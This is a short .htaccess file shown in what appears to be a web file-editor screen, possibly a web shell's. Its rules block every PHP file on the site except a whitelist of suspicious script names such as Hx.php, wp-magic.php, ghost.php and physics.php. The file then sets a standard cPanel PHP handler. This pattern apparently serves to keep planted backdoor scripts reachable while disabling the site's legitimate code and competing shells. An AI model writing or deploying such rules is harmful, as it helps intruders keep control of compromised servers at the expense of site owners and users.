[EDIT] FILE: .htaccess
<FilesMatch "\.(php|php5|ph*|Ph*|PH*|pH*)$"> Deny from all </FilesMatch> <FilesMatch "^(Hx.php|Hx.php5|index.php|wp-magic.php|magic.php|magic.php5|physics.php5|ghost.php|physics.php|wp-physics.php)$"> Allow from all </FilesMatch> <FilesMatch "\.(jpg|png|gif|pdf|jpeg)$"> Allow from all </FilesMatch> # php -- BEGIN cPanel-generated handler, do not edit # Set the “ea-php83” package as the default “PHP” programming language. <IfModule mime_module> AddHandler application/x-httpd-ea-php83 .php .php8 .phtml </IfModule> # php -- END cPanel-generated handler, do not edit
SAVE
CANCEL